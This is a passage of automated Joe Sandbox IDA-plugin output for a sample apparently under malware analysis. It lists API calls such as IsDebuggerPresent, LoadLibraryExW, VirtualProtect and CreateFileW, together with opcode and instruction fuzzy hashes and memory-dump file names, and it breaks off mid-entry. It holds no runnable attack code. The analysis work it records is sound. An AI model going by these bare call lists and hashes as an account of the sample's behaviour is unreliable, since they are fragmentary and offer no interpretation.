                                    • Instruction ID: 71f36024eff09e9d333b58d60e3199c1dc4d76b8b5010829a8e55af2627cb59f
                                    • Opcode Fuzzy Hash: 7e6d57b1535bae0ee250f5b59436942e7cc9da9264dde508fca493bd65224040
                                    • Instruction Fuzzy Hash: 0741F371500A01DFD3289B28C842A7A77E5EF59332B14861EECBA9F2D1DB74D8498B61
                                    APIs
                                    • 74B1C8D0.UXTHEME ref: 00133A73
                                      • Part of subcall function 00151405: __lock.LIBCMT ref: 0015140B
                                      • Part of subcall function 00133ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00133AF3
                                      • Part of subcall function 00133ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133B08
                                      • Part of subcall function 00133D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00133AA3,?), ref: 00133D45
                                      • Part of subcall function 00133D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00133AA3,?), ref: 00133D57
                                      • Part of subcall function 00133D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,001F1148,001F1130,?,?,?,?,00133AA3,?), ref: 00133DC8
                                      • Part of subcall function 00133D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00133AA3,?), ref: 00133E48
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00133AB3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 3809921791-0
                                    • Opcode ID: bd252c7ca09571fd2cdf04c3248730bfb234458c9da891ff6efbea6fc5a0551a
                                    • Instruction ID: 568a47b782045e7ade014e54b594a069aec174723c57cd072c2ecfeed45d3aeb
                                    • Opcode Fuzzy Hash: bd252c7ca09571fd2cdf04c3248730bfb234458c9da891ff6efbea6fc5a0551a
                                    • Instruction Fuzzy Hash: 21119D71908341EBC300EF69EC4592ABBE8FFA5710F00891EF499C76B1DB709584CBA6
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00134582,?,?,?,?,00132E1A), ref: 0013482D
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00134582,?,?,?,?,00132E1A), ref: 001A4089
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: cfabfde9e299b976b3374ceffe2fee381dbca9b14b7f6bc232f9e714a928c511
                                    • Instruction ID: dccca27c309d49fb9ff03d00c392087cc1a9e21a6d7380e42911a0821bc3895a
                                    • Opcode Fuzzy Hash: cfabfde9e299b976b3374ceffe2fee381dbca9b14b7f6bc232f9e714a928c511
                                    • Instruction Fuzzy Hash: F9018C74244348BFF7250E68CD8AFA63ADCEB0176CF108358BAE56A1E0C7B12C85CB50
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 0015EA29
                                    • __close_nolock.LIBCMT ref: 0015EA42
                                      • Part of subcall function 00157BDA: __getptd_noexit.LIBCMT ref: 00157BDA
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                    • String ID:
                                    • API String ID: 1046115767-0
                                    • Opcode ID: 527138aabf1a0d6f6a6413686098a19e6c277d2779ac6df1412efa99fbf62ac2
                                    • Instruction ID: f2aa3cd5a4fdf0d9a44c8fc9d280a46e05f39eba8762793859b0e8f7bccbbc93
                                    • Opcode Fuzzy Hash: 527138aabf1a0d6f6a6413686098a19e6c277d2779ac6df1412efa99fbf62ac2
                                    • Instruction Fuzzy Hash: 19117072D45650CAD71ABB78D84235C7AA16F92337F6A4340EC355F1E3CBB48A4886A1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 75e1414783615d1a1a0994c538508165ba4f7afdd02ea681e5e92a1dc697222f
                                    • Instruction ID: f6a4a432014666b637626281551bb09d4241f4c1e760b0e4d8c881298b4a83b9
                                    • Opcode Fuzzy Hash: 75e1414783615d1a1a0994c538508165ba4f7afdd02ea681e5e92a1dc697222f
                                    • Instruction Fuzzy Hash: AC018471900209EBCF26AFA5DC0249E7B61AF503A2F154619FC345F1A1D7318B69DB91
                                    APIs
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __lock_file.LIBCMT ref: 00153629
                                      • Part of subcall function 00154E1C: __lock.LIBCMT ref: 00154E3F
                                    • __fclose_nolock.LIBCMT ref: 00153634
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 6e4a0e86083a3eeca2783d0fc8df1b6adb072c64f7e7eeaa3465907c9a91c0eb
                                    • Instruction ID: a9262c6526d0e6d805548cc25fd4bcc5d4e1dfa8af50eb21405ee676c4ce2ab8
                                    • Opcode Fuzzy Hash: 6e4a0e86083a3eeca2783d0fc8df1b6adb072c64f7e7eeaa3465907c9a91c0eb
                                    • Instruction Fuzzy Hash: 9BF0B431901604EAD712BB65C80276E7AA06F61376F65810CEC30AF2C1CB7C8B099F95
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b02b76be593ca06d9dd18e29d5eb1cdb603f5d1a0c94dc8d346a86dfa0c9a069
                                    • Instruction ID: 51c0397f56e4fcfb22face60bb35ee2015b4a69710f9b57652145a0cedff822c
                                    • Opcode Fuzzy Hash: b02b76be593ca06d9dd18e29d5eb1cdb603f5d1a0c94dc8d346a86dfa0c9a069
                                    • Instruction Fuzzy Hash: D471F671908380DFEB26CF24C4857AA7BD1FB52314F08497AE8859B2E1E7759885CB42
                                    APIs
                                      • Part of subcall function 0177B7F0: GetFileAttributesW.KERNELBASE(?), ref: 0177B7FB
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0177C100
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    • Opcode ID: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction ID: 064a1068aed9e69df6cf10b3f9cc6452ee60fc3812857e85982b8590598dfeed
                                    • Opcode Fuzzy Hash: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction Fuzzy Hash: 76618431A1020D97EF14EFB4D854BEEB33AEF58700F009569E60DE7290EB759A44CBA5
                                    APIs
                                    • __flush.LIBCMT ref: 00152A0B
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __flush__getptd_noexit
                                    • String ID:
                                    • API String ID: 4101623367-0
                                    • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction ID: fefcc096a3e0e3a2f3c2bd5153ba91875599a7ac6b2785d5d97e69a735c45a9b
                                    • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction Fuzzy Hash: C441D372700716DFDF2C8E69C8815AE77A6AF56362F24852DEC65CF640EBB0DD488B40
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00134774
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: eece721675eb64d467b3ee7c34e9e49341dfd61002b4d814f92ecf25be261236
                                    • Instruction ID: e133725525b5d54db0b62613ecc76aba89aa5e87504459285405bbb61adcc2da
                                    • Opcode Fuzzy Hash: eece721675eb64d467b3ee7c34e9e49341dfd61002b4d814f92ecf25be261236
                                    • Instruction Fuzzy Hash: 9F315B75A00645EFCB08CF6CD480AADB7B5BF89320F158629E81997700D770B9A4CBD0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: cfcf511ab321608c15686dcdedbc157dec821b0591c667593699aa5cb6742b35
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: BC31C274E00106DBD718DF98C490A69FBF6FF49340B6586A5E40ACB266DB31EDD1CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 7387e29e9035e124a4127bafb338205a37f5dab60a56257727ae920aa1aa5b7c
                                    • Instruction ID: afcc07dce5821a53327d710d949627fe2d7eaff66a2244dc97fe8dc0fdb897c5
                                    • Opcode Fuzzy Hash: 7387e29e9035e124a4127bafb338205a37f5dab60a56257727ae920aa1aa5b7c
                                    • Instruction Fuzzy Hash: 24415B74504611CFDB25CF58C484B1ABBE0BF45304F1989ACE99A4B372C372E886CF52
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 645c12cc53c94127999ea956a3e41c1d86cc55840813eb259c6a3a684e3533fd
                                    • Instruction ID: 6bea1ab02612afd0fdda7ecf6b456afdc902f8d142481878f30a81f71a2fb41e
                                    • Opcode Fuzzy Hash: 645c12cc53c94127999ea956a3e41c1d86cc55840813eb259c6a3a684e3533fd
                                    • Instruction Fuzzy Hash: 68213072C15644CFD71A7FA4DC467583AA1AF62337F260640EC744F1E2DBB48A488AA1
                                    APIs
                                      • Part of subcall function 00134214: FreeLibrary.KERNEL32(00000000,?), ref: 00134247
                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001339FE,?,00000001), ref: 001341DB
                                      • Part of subcall function 00134291: FreeLibrary.KERNEL32(00000000), ref: 001342C4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load
                                    • String ID:
                                    • API String ID: 2391024519-0
                                    • Opcode ID: ebd350db7e0a273a1b476c1cd86b89b389acdd27efcb2d55ee93c66ef4ec7d98
                                    • Instruction ID: 0a617f98205abbf2beaaf19f1c7afb3da7b4659a1c62d120750fc79b510547f2
                                    • Opcode Fuzzy Hash: ebd350db7e0a273a1b476c1cd86b89b389acdd27efcb2d55ee93c66ef4ec7d98
                                    • Instruction Fuzzy Hash: A111A331600316ABDB14BB74EC06F9E77A99F50700F108429F996BA1C1DBB0AA449BA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 67448bbaaa9d0ac31d949e14fd53ae8ec60eb62d94d7a208ec1370563f9d1d76
                                    • Instruction ID: 0ad0f8723b7509831522f43d94b4184cdfd7c91172b903978f4a74b898211f27
                                    • Opcode Fuzzy Hash: 67448bbaaa9d0ac31d949e14fd53ae8ec60eb62d94d7a208ec1370563f9d1d76
                                    • Instruction Fuzzy Hash: 94214470508201CFDB25DF69C444B1ABBE1BF89304F15496CEA9A8B232C732E846CF52
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 0015AFC0
                                      • Part of subcall function 00157BDA: __getptd_noexit.LIBCMT ref: 00157BDA
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle
                                    • String ID:
                                    • API String ID: 1144279405-0
                                    • Opcode ID: a56b3f6e796adc405d806846667284c09848ddb635eff508bf1006082ccf2145
                                    • Instruction ID: d86e98961d63c69910f3489a624ce252f779a0c26c5e33165c3a0eab81123c84
                                    • Opcode Fuzzy Hash: a56b3f6e796adc405d806846667284c09848ddb635eff508bf1006082ccf2145
                                    • Instruction Fuzzy Hash: C5116072809610DFD7126FA4D88276D7660AF62337F5A4340FC341F1E2D7B48D488BA2
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,001CDC00,00000000,?,0013464E,001CDC00,00010000,00000000,00000000,00000000,00000000), ref: 0013C337
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: c014f59b63db2c459f43c371277dd065e4d98267c733c288f0efd1df1b6a3742
                                    • Instruction ID: 2f16bdd84adcb161f29ffa9b096008e96875a6c8de9268db48f686c5941dc0b2
                                    • Opcode Fuzzy Hash: c014f59b63db2c459f43c371277dd065e4d98267c733c288f0efd1df1b6a3742
                                    • Instruction Fuzzy Hash: 1A114531200B419FE720CE5AC880F6AB7E9BF54754F14C41EE4AA9AA50C7B1E844CBA0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                    • Instruction ID: 4c46899dc2dee30a1f62ea9c7ff7861f7f2bb1d06f0017be2129aebcfd84ec07
                                    • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                    • Instruction Fuzzy Hash: 28013135500109EFCF05EFA4C8928FEBB74AF21344F108069B566A71A5EB30AA49DFA4
                                    APIs
                                    • __lock_file.LIBCMT ref: 00152AED
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
